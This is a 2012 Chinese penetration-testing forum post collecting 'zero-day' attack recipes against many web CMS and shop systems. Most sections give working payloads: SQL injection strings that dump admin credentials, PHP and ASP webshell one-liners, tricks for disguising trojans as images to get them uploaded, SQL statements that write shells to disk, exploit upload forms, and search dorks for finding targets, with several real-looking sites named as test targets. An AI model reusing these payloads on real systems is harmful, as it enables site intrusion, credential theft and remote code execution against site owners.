中国网络渗透测试联盟
标题:
0day合集
[打印本页]
作者:
admin
时间:
2012-9-13 16:58
标题:
0day合集
启航企业建站系统 cookie注入漏洞通杀所有版本
" A( B8 B- l. F4 w+ U6 P+ _
2 {, z( a% R$ y
直接上exploit:
/ `/ Z( v6 T _7 p$ v
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
* \0 J* ~# R: m0 z
test:
http://www.tb11.net/system/xitong/shownews.asp?id=210
. Q8 G4 m: m" x, ~3 k) h- o6 H2 l
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. P6 w2 J" B I6 S2 X5 j i3 W
Asprain论坛 注册用户 上传图片就可拿到webshell
6 z! \- m- S+ W; v: C
: `: w& |) f- K1 U' s1 p
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
4 k, d* V4 ?% J$ U! _6 Y
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
Q3 U& u% g" ?0 s6 y( C( P* s
2.gif 为一小图片文件,一定要小,比如qq表情图片
4 S6 p a3 b/ [0 C
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
' r4 q, q/ b6 L
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
& @$ m1 J+ {: [6 [5 I7 ~1 v. {
5.q.asp;.gif
: a" @. r9 D6 z# [/ s. J
google:Powered by Asprain
: l' d9 E, @8 u3 i. I# x6 I% l
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 B) m" C: W+ Z9 v- T/ p
- O n+ i8 Y" B$ g# S7 ~
ShopNum1全部系统存在上传漏洞。
8 x }$ E0 i) S9 @* |3 T
4 p" n. n7 D# L: t
首先 在
http://www.shopnum1.com/product.html
页面查看任意产品详细说明。
$ ^0 w: j# W& [+ q- G- m- M
按说明 提示登录后台。。
% E4 ?6 I' [* _; Q7 Y5 _+ U5 q9 A9 Q
在后台功能页面->附件管理->附件列表
3 i0 B& Z4 a3 S
可以直接上传.aspx 后缀木马
3 ^' d+ H( S; A8 h
http://demo.shopnum1.com/upload/20110720083822500.aspx
[* K5 ^! l- S7 D, {- Q
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 n# Y: J* }2 c# Q
' S* Z" V5 o. Q. J& J
牛牛CMS中小企业网站管理系统 上传漏洞
! D Q d- R* B+ h9 h
^: D0 G$ A0 @
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
( ?6 ^% ?1 U& _# L: n
后台:admin/login.asp
2 n' b5 b- Y% j" d7 b O
ewebeditor 5.5 Nday
* ~" O' o) u( `. C& W: M; O V& s
exp:
' t. M& \* `3 b$ X, _
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
) G) R" }) J, ]; X2 G r- {4 I _
<input?type=file?name=uploadfile?size=100><br><br>?
9 ~* D5 w$ U! M, I9 M0 P& h: t& w
<input?type=submit?value=upload>?
: C$ i# M, w5 `
</form>
7 P5 t1 r0 r: j5 k
ps:先上传小马.
' |& I4 ?3 @0 d* G: ^
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
1 Y; Y" K2 o R7 F1 \
* d6 |8 O! A) a; Z) Q
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 l5 \3 P3 q6 j- x( y4 ~ X' g
6 g; V0 W' f/ W( y3 T
YothCMS 遍历目录漏洞
3 O& [( F* z- B+ v4 |- ~1 S
$ ^! A7 r/ X3 D2 k
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
. _3 ~. z: w2 R. ?$ P2 Z6 P* a, N; m
默认后台:admin/login.asp
& `9 E2 y2 V( J+ j0 Q
遍历目录:
+ f" n6 H0 g* @' i
ewebeditor/manage/upload.asp?id=1&dir=../
- }/ Q/ ?) T$ E. `6 ?" O
data:
/ o9 _( L7 e1 x3 {; S1 _
http://www.flycn.net/%23da%23ta%23
\%23db_%23data%23%23.asa
1 { D3 Q1 l- e" R$ e t: o) s
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( l9 f" a7 b7 o9 |
: M' ^0 b" w) R, n8 ]/ C- V
Net112企业建站系统 1.0
0 b; g8 |0 H$ P: l% G0 ~0 m
1 P" n5 ], c! u0 N% f
源码简介:
8 R. j: C: q5 _1 _* o$ m3 j& q
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
( Q2 ]: `3 e6 I0 R
添加管理员:
8 U7 d7 j4 C$ J! X! E S
http://www.0855.tv/admin/admin.asp?action=add&level=2
4 K6 \1 g | o+ P2 u6 q
其实加不加都不是很重要,后台文件都没怎么作验证。
) D( g" G, _( }9 \
上传路径:
& I1 J, w7 _$ t3 l ~+ m
http://www.0855.tv/inc/Upfile.as
... 0&ImgHeight=200
' O# D/ ~& }1 o" i
http://www.0855.tv/inc/Upfile.asp?Stype=2
- m& G9 S6 s, J L- {
怎么利用自己研究。
' w$ b6 G( c; r/ m+ U A
遍历目录:
2 U8 V9 V4 l4 \8 j4 O+ V
http://www.0855.tv/admin/upfile.asp?path=../..
2 k0 d% v9 [* `% Y$ L
如:
T: z" k$ ^( ` |: L
http://www.0855.tv/admin/upfile.asp?path=../admin
! z& I% ^8 H, |( h5 n( M
http://www.0855.tv/admin/upfile.asp?path=../data
! T. S, g" ?6 C% n2 r$ I
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 Q$ V. Y H* N+ }/ G! Y# k" {
: I3 O2 B6 a& N* V/ [
易和阳光购物商城通杀 上传漏洞
# G/ L* f& n" e! J1 S% Q
) B- I. y2 F# `6 W6 |
前提要求是IIS6.0+asp坏境。
- a! O5 J, M0 U6 k" E+ W/ r
漏洞文件Iheeo_upfile.asp
: B6 Q$ b$ ]- w0 T2 X
过滤不严.直接可以iis6.0上传
2 D0 F- d( D! F
把ASP木马改成0855.asp;1.gif
5 Q( B7 y& k6 y- u) ?( L
直接放到明小子上传
# A5 \3 D2 J) w3 V, o
Google搜索:inurl:product.asp?Iheeoid=
' e6 H* Y! k- P
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 x9 N6 {0 n0 [) H
8 q o; T. s( d) E( }
phpmyadmin后台4种拿shell方法
- p; X6 m b% E: ^2 p9 r
' `5 ~( B/ N- V, N9 J
方法一:
! v- ~- o8 M" Q3 v- }4 x
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
2 W2 R3 `( i, v& F9 m5 ]0 z
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
3 a! q# g! i7 p" T. N
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
7 c6 l! v) v; b" C2 v: }
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
, e, }& P& E" j7 p
一句话连接密码:xiaoma
9 N9 e! q/ i6 y% q# B
方法二:
# Q/ y$ @6 N5 v4 Z6 s& F8 B- f
Create TABLE xiaoma (xiaoma1 text NOT NULL);
5 B h- B2 M0 @' j% y1 ] V: Y ?
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
7 X, q+ d8 S$ ^/ W# g. u; V
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
% `9 k( R2 ^8 S
Drop TABLE IF EXISTS xiaoma;
! e4 @- v" G# G$ G4 z/ e: k8 L
方法三:
' ?) l) M1 G( B3 ^; y! J
读取文件内容: select load_file('E:/xamp/www/s.php');
\- s" O. p! v5 Z' K7 _3 N
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
% ~, |' |% E5 t2 n
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
- `/ _& ?9 q. V( j6 f8 d$ x
方法四:
' g8 T6 o5 e# K; e" U! W& b+ E4 n
select load_file('E:/xamp/www/xiaoma.php');
; f$ M1 j, @' P* \& }* ~! n
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
{- J$ D: h* a4 S
然后访问网站目录:
http://www.xxxx.com/xiaoma.php?cmd=dir
' Z. i- \$ T Y
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 O/ w; v1 ?, g( a- \) } ~
& Q! k/ j. F( L4 P2 P x3 R
传信网络独立开发网站源码0day漏洞
$ p/ i9 R1 }2 E$ A
2 u) n; @& e' z, P5 j5 w$ r7 q
后台system/login.asp
+ A4 L0 i) `% |! k' O
进了后台有个ewebeditor
% i" d8 b9 o3 e
Google 搜索inurl:product1.asp?tyc=
7 w* _( m* b! e! B
编辑器漏洞默认后台ubbcode/admin_login.asp
: @0 V1 g/ u7 q+ s; m5 i
数据库ubbcode/db/ewebeditor.mdb
% `* m% z# U, B
默认账号密码yzm 111111
2 L0 J$ I3 R+ {! e6 d
6 c8 ~* ]3 ^6 G: S( Z
拿webshell方法
1 K% ?( `; [6 K2 ~
登陆后台点击“样式管理”-选择新增样式
# l% K7 Z3 Y2 W. ~
样式名称:scriptkiddies 随便写
! }6 a, b( u1 c# W1 P
路径模式:选择绝对路径
/ J8 u- z. _( s0 W( G
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
: W+ d5 }5 {, G2 b) h
图片类型比如就是我们要上传的ASP木马格式
1 r0 R( e) P- ]& s
上传路径:/
/ G# Y" w8 e+ e9 n
图片限制:写上1000 免的上不了我们的asp木马
+ \& A4 v0 L2 J& _0 K; B! e
上传内容不要写
8 `& e3 O, b/ E2 l3 G, n/ b, _* I
可以提交了
2 Y: U7 s# M7 |: q9 q, i( P
样式增加成功!
3 q! O) ~$ j- k0 O1 [, ~% i% I7 G
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
0 \+ }: H; ~7 @9 O9 X( z
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
, h q5 R) ?7 U2 }( C- r# ?
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
5 m; I, {9 Y4 W( V
上ASP木马 回车 等到路径
a; L) @6 x; Z( ?. c
7 E! U2 T3 t' X& H1 c) z3 Z6 H
后台:system/login.asp
* ~3 W' }+ U+ B3 P6 z& ~
Exp:
/ A& z( N4 _9 \% ~7 y, G+ d
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
7 t1 H5 F/ n0 G2 X5 l
测试:
3 x9 K8 i! ]3 h* s3 a/ |
http://www.zjgaoneng.com/product_show.asp?id=9
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
E* L: \; O$ E! q" z* b2 m4 A
http://www.yaerli.com/product_show.asp?id=245
union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
& K/ [* | T' |+ k) o& N
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! f8 E0 @, q* z! Y3 h' t' d8 f
, d6 m6 y: s/ J( k' K
foosun 0day 最新注入漏洞
7 `+ t4 u2 e: ]+ k% L* V" c* k |( ?
3 b' ^$ ^. R0 R5 V; x
漏洞文件:
www.xxx.com/user/SetNextOptions.asp
8 R/ w- `% E4 U0 x8 l5 ~% V
利用简单的方法:
1 ^: u6 N! i/ K+ h
暴管理员帐号:
) g: X0 N3 v2 z
http://www.i0day.com/user/SetNex
... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
4 I2 i4 q0 g. m. a' `0 G) Y
暴管理员密码:
0 m: a+ Z3 f+ ^# W4 {
http://www.i0day.com/user/SetNex
... amp;ReqSql=select+1,admin_pass_word,
1 y U0 ? Y& Y% V
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 ?1 Z0 Y" o; h( c+ ~3 k
" E$ ^# I2 [# _$ F
网站程序的版权未知!
. |0 z2 Q3 ~7 V/ _* [
% i+ ]# n. x- c
默认网站数据库:
& E. ?# Y) a: A2 F' p# ~$ g
www.i0day.com/data/nxnews.mdb
6 w6 B% B+ f, z3 G# J
ewebeditor 在线编辑器:
" v; s; i1 s+ M
编辑器数据库下载地址:
www.i0day.com/ewebeditor/db/ewebeditor.mdb
/ `% X- ^$ H1 U5 d0 _ ~5 W+ {
登录地址:ewebeditor/admin_login.asp
# f: J0 Z8 f, v% i. w
默认密码:admin admin
) e/ a6 Q m" p2 b$ N
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
! t" O! Z3 T) ]0 C
6 P' K9 j$ h' H3 z2 L" x
Sql注入漏洞:
1 ]+ A! U, A& m- ^
http://www.i0day.com/detail.asp?id=12
( n+ V3 @! Z) p8 v; K- O1 q
exp:
: ]* y o6 ~! i5 l/ O
union select 1,admin,password,4,5,6,7,8 from admin
0 v( X% E+ E; d
爆出明文帐号/密码
4 m7 P/ z+ x& I
. P0 u2 o: z/ @- I0 x
上传漏洞:
2 O* ]* N* p6 \9 U3 R/ p, N
后台+upfile.asp
O, A. C( c: y0 m( a& A% |4 v
如:
/ Z' D; _( A7 G% @2 W. [) Q$ |
http://www.i0day.com/manage/upfile.asp
可以用工具。如明小子。
+ p3 e4 l; U# X" i# H
shell的地址:网址+后台+成功上传的马
# ?2 S5 x# A& K b; H# ~. |
google:inurl:news.asp?lanmuName=
. I: w% Y/ z$ l5 E8 h2 g w
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; O' _! I5 |# A
, `# e8 }# h& y. C
dedecms最新0day利用不进后台直接拿WEBSHELL
7 x5 l& Q0 y7 V h. @
: I1 A" ~) X C! `
拿webshell的方法如下:
$ J7 ^+ P& Q( j. I: }3 d3 g4 o
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
6 g: @4 [+ s+ g" E3 M% h9 }
前题条件,必须准备好自己的dede数据库,然后插入数据:
7 |2 j$ [: o) ]3 f& Z2 w( Y
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
$ H; l& Y$ I% y; f) Z- e
, A# w+ F3 t. d
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
$ R Q" u6 ]0 I# V1 o9 k
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
1 i. z0 L. o0 N
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
1 n% [ P, ]: p' a$ w
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
! O. n! t9 H! a1 ~' t& s
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
i: x) a9 q$ e( G% H
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
/ i" ~& c! Y2 O9 ]
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
Z- p( L6 J' ~5 _ d. Y- ^
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
4 Q" Y- x1 u5 a8 p0 _/ N
<input type="text" value="true" name="nocache" style="width:400">
1 G G! P7 @8 U1 v/ T, K' I
<input type="submit" value="提交" name="QuickSearchBtn"><br />
- J" J, M# A+ F% S9 @& q1 B
</form>
w' r+ X# G+ u6 `
<script>
! q( a7 }1 U8 x8 u4 l
function addaction()
" A! ~# A; s6 N; f9 K- E
{
, T4 B7 d8 y+ t+ D3 M# [$ a
document.QuickSearch.action=document.QuickSearch.doaction.value;
& [$ ^! ?, x- Q: O- H: X
}
' X/ I9 f! F/ c9 k5 M' N5 ~4 `
</script>
1 D. ~2 t; F( d5 @* |; V
-----------------------------------------------------------------------------------------------------------------------------------------------
7 _: t4 {* o$ e
8 ?0 E) r9 o9 M' X1 F
dedecms织梦暴最新严重0day漏洞
% ]' n- K8 x" \* b1 V
bug被利用步骤如下:
/ X- z0 ?: {/ {0 F4 D
http://www.2cto.com
/网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
3 B5 l/ f" ?; I+ A! N7 d
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
8 j8 c8 G6 U3 J9 r5 z' B8 D
-------------------------------------------------------------------------------------------------------------------------------------------
, N: W1 ?( H9 ^3 [
3 E+ A$ p, u/ [0 m* i2 }) C; N* a
多多淘宝客程序上传漏洞
4 ?- g/ W* ?1 ]
漏洞页面:
" L3 ^# {- ^4 Y. {
admin\upload_pic.php
5 j8 K7 |: f, \% I' I- K
传送门:
0 P2 z, s6 f* j, J( _0 T0 V
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
' U S( _ @* d+ m/ |
PS:copy张图片马 直接 xxx.php 上传抓包地址!
- k( Z/ X( ]$ G1 j
------------------------------------------------------------------------------------------------------------------------------------------------------
0 K% h6 }4 N' m
: u$ C& r- K0 L) L# a3 ^, h/ @
无忧公司系统ASP专业版后台上传漏洞
C1 a8 L" I% { E
漏洞文件 后台上传
1 ~" T8 y: z5 B9 ~+ u
admin/uploadPic.asp
0 f: ?6 L" }2 I
漏洞利用 这个漏洞好像是雷池的
3 j' P; a1 `$ b4 q6 x0 k
http://forum.huc08.com/admin/upl
... ptkiddies.asp;& upload_code=ok&editImageNum=1
) E) g' C) P$ M- m% o
等到的webshell路径:
; t$ z5 W( l0 @( k( C
/UploadFiles/scriptkiddies.asp;_2.gif
% l; n4 a' [ P- `2 B
---------------------------------------------------------------------------------------------------------------------------------------------------
+ E6 }3 d: n1 ?) P7 ]3 J# m& e& {
4 i9 p* T& u ~6 w/ d
住哪酒店分销联盟系统2010
; w6 _, ^7 Q& Q: ]8 `) r
Search:
) D" Z* e( j' r. |& S5 B
inurl:index.php?m=hotelinfo
0 C) t! b; M- q: ^
http://forum.huc08.com
/index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
: @6 n# l( B F3 b7 \: H# n
默认后台:index.php?m=admin/login
, l- c! k* u& R4 D$ Z7 q, R
--------------------------------------------------------------------------------------------------------------------------------------------------
/ c1 R$ f/ T0 c5 X' L
8 Y; m# m$ r9 @) Z2 {2 |% o! k
inurl:info_Print.asp?ArticleID=
: e' K! H" U% k5 {* O# ?9 D+ W4 A
后台 ad_login.asp
5 U3 U* D. _! Q
爆管理员密码:
+ K# K3 c: h, T" t" e
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
9 I$ S3 o9 K. U& q/ S
------------------------------------------------------------------------------------------------------------------------------------------------------------
, I. a2 f- H/ N. t
; n, n4 i9 B# F/ q2 ?
搜索框漏洞!
( x3 v) J8 c+ k" @, k, x4 `% I
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
- e8 k5 x4 R% B/ Q$ B$ [. {, E9 G
--------------------------------------------------------------------------------------------------------------------------------------------------------
" j5 x" l7 j+ E/ j1 R
9 e. @1 r: H. J; J; S
关键字:
! b; D) G- K2 A, ` o5 y
inurl:/reg_TemletSel.asp?step=2
& q2 e3 C3 K, w8 [. J# M. _
或者
- D* V; r c+ {& y3 L/ r$ z
电子商务自助建站--您理想的助手
$ j9 u( N1 C! Y& ?4 `8 I
-------------------------------------------------------------------------------------------------------------------------------------------------
+ u# ?1 C' R' _* Z
+ M: Q8 ?2 {9 k* T( V1 u6 C1 D3 j
iGiveTest 2.1.0注入漏洞
' ~1 X) @( y) w y6 ^
Version: <= 2.1.0
3 C5 v+ y, v- m* b) o% I* u
# Homepage:
http://iGiveTest.com/
& i+ T: s: `+ z) i& ~7 z
谷歌关键字: “Powered by iGiveTest”
6 G* N: O- \. ^2 c, E; ~
随便注册一个帐号。然后暴管理员帐号和密码
7 e. E. W7 e. b0 I: d; o& ^
http://www.xxxx.com/users.php?ac
... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
$ o4 I0 y% y: f) W. X
------------------------------------------------------------------------------------------------------------------------------------------------
1 |9 b% G2 w- [9 G R
# o3 j9 Y' x& Z
CKXP网上书店注入漏洞
% C; ]$ p z7 L4 F6 P, c4 P$ ]
工具加表:shop_admin 加字段:admin
) `: [( N" l1 ^ _- e
后台:admin/login.asp
8 {( T# K9 R1 C6 y
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
. t; b: c, Y U Z" [, K
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
9 T0 G& d; F3 B# g4 Z
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
p! @7 Z- y5 O- q# E7 Y" s
n1 R; b6 p, T Y8 c" b: m* |
段富超个人网站系统留言本写马漏洞
* ]9 b& `. m& [7 F E2 G
源码下载:
http://www.mycodes.net/24/2149.htm
" `4 G) J- g: ^; s7 C
addgbook.asp 提交一句话。
' ]) a& ?; N' M" P
连接:
http://www.xxxx.tv/date/date3f.asp
1 v0 q5 t( ]7 Y; H
google:为防批量,特略!
3 X* ]; E5 P" A' ~9 J2 h) w
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) J) O- a6 z" n$ V; _
' B& `* Y# c1 M: G
智有道专业旅游系统v1.0 注入及列目录漏洞
" ~5 |5 C0 b( z( m$ G' Q9 A
默认后台路径:/admin/login.asp
" J% {+ q' C0 Z. a
默认管理员:admin
& }# d' o8 @' {- F6 C
默认密码:123456
1 ]1 }7 |* A( U/ c5 Z# _
SQL EXP Tset:
( A8 ^: [3 Y! [( f! h3 B% G. K
http://www.untnt.com/info/show.asp?id=90
union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
0 D! Z4 a0 G2 c0 e) Y* @
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 K W+ I9 W U$ u6 L9 q
x$ E5 p- N2 r7 v& V/ @9 P/ c, `
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
" e& d, U$ k$ R) N1 B& V
EXP:
& F$ `+ {( h% K! z
<title>eWebeditoR3.8 for php任意文件上EXP</title>
$ Z) d* k* g( f8 r0 z
<form action="" method=post enctype="multip
H5 B' E, i" V3 p% A
art/form-data">
3 f' x- }1 K9 K4 {, A2 D
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
- @9 N6 S! |. L5 F" ^
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
5 ], }" q: z% W! ?6 h4 G0 S _) K) ]
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
: C- Z2 p- x5 d. Y
file:<input type=file name="uploadfile"><br>
3 F5 T% c& M: ] M/ {" X& `: e( e
<input type=button value=submit onclick=fsubmit()>
( o7 S d) Q4 y
</form><br>
) E# q) ~7 I/ E' q9 I' [& P
<script>
3 }+ d; l1 u2 U6 V4 i8 K ?
function fsubmit(){
4 o/ w' V1 k$ K. q2 q3 o6 d
form = document.forms[0];
: C- _' f0 s1 ]! r
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
! Y& C& I! K0 x$ P7 P( p: x! W
alert(form.action);
$ u9 ^. w. S7 T& Y% @- c
form.submit();
4 v( d* w4 Z5 l! q* q6 M; ~
}
2 c" o# f9 G% g( f) y7 L% R4 s
</script>
: k. q# }. ^+ r5 T
注意修改里面ewebeditor的名称还有路径。
! c) f3 ]# K1 @4 O
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' E# w( G; p1 T1 X
" g; ]* u+ w1 V& r0 G
提交’时提示ip被记录 防注入系统的利用
& p o+ w+ ^( F% a' k* u
网址:
http://www.xxx.com/newslist.asp?id=122
′
4 [' b6 B0 k1 u, c2 o
提示“你的操作已被记录!”等信息。
' f) i6 D/ B+ k. }
利用方法:
www.xxx.com/sqlin.asp
看是否存在,存在提交
http://www.xxx.com/newslist.asp?id=122
‘excute(request("TNT"))写入一句话。
0 ~+ p- i. P6 N2 ^
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# x1 q& D* r C4 m
0 K. x* D. h' V* J7 N. A% c2 a- ]
西部商务网站管理系统 批量拿shell-0day
1 [8 V/ P4 _: v( r
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
% ]/ K$ K" a5 c2 J
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
8 M& w) S- ]1 c+ M* `8 y
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
1 R3 O1 u3 m' n1 l- i* _% C
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
5 Y/ N/ q" @* k j7 g7 H
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: e/ L( _7 s9 `/ J/ H- C
# E& J4 t z4 H. Z
JspRun!6.0 论坛管理后台注入漏洞
" q# [* B' s1 O& _; u$ R
: f5 n7 a3 t* g0 p3 }* O6 V6 s. C
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
& y$ o! F* ^0 _2 w' a3 Q
JspRun!6.0
' C. F$ ?- A' E0 Z# F
漏洞描述:
6 J+ [0 g3 z8 Z/ C4 s7 r. U
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
6 [8 \9 |: y& w/ v: ?9 O8 M7 I+ H
在处理后台提交的文件中ForumManageAction.java第1940行
9 G! N$ H( B+ _" w/ U9 u7 R. x1 k
String export = request.getParameter("export");//直接获取,没有安全过滤
# q2 _0 Y* H3 ?) M) t# f4 F6 |
if(export!=null){
1 J @- r: g" ]3 w) ~& Z
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
7 F9 M8 R9 f: v1 V# G
if(styles==null||styles.size()==0){
: L( e3 h; L9 Y; Q5 [, d- p
<*参考
7 n6 ?5 t$ z- E1 ~
nuanfan@gmail.com
P' C# p* p' q7 L
*> SEBUG安全建议:
! z( |% F* v; s! p/ H- b; c
www.jsprun.net
1 ?$ q& M+ a( {
(1)安全过滤变量export
7 S+ D' S! G& W6 s( X, f. m/ v
(2)在查询语句中使用占位符
D, w! g. P" _# [: c7 g* @
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; A! D+ ~0 g7 d% k
+ D9 l" E7 l& _# e
乌邦图企业网站系统 cookies 注入
# m) F8 {& ]# K" j7 f. K2 p# ~' R
; P" O) i6 I& D# x% s2 L; t
程序完整登陆后台:/admin/login.asp
t ~* T! Z1 M) o7 C* N
默认登陆帐号:admin 密码:admin888
2 R/ _: K6 m) Z* l
语句:(前面加个空格)
9 {, Z- I" ]0 b8 x3 v# p4 p
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
4 ]+ f4 r( k9 z5 l2 W6 X" S0 _
或者是16个字段:
: A3 `# H# c; N: Q" k. H
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
% E Z4 n8 e/ G
爆不出来自己猜字段。
& U* Y- `; a K1 I
注入点:
http://www.untnt.com/shownews.asp?=88
) x+ u; v: ~5 M% P8 f% C. k! N: h
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
. h. s' H# K4 S# t4 R$ n7 |
关键字:
! d9 M- q# h: N& x
inurl:shownews?asp.id=
5 z" E* V+ h# u/ R% w& n: U) _2 t
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 O& X" V. u S! f& d5 d
& M/ l0 d- G% B8 Q# p- z/ ?/ a
CKXP网上书店注入漏洞
; Y; W7 G; h/ z+ o% _6 B- v
' B2 y8 b8 ^' C8 B+ w( y% A# d$ Y& {- y
工具加表:shop_admin 加字段:admin
* J3 D$ X, V7 l( u4 [9 ?& B7 c
后台:admin/login.asp
% I. I7 p# m# n! O7 h2 F6 M3 Y
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
0 j' H6 `7 m3 C: O, O, z( \) L# Z; t
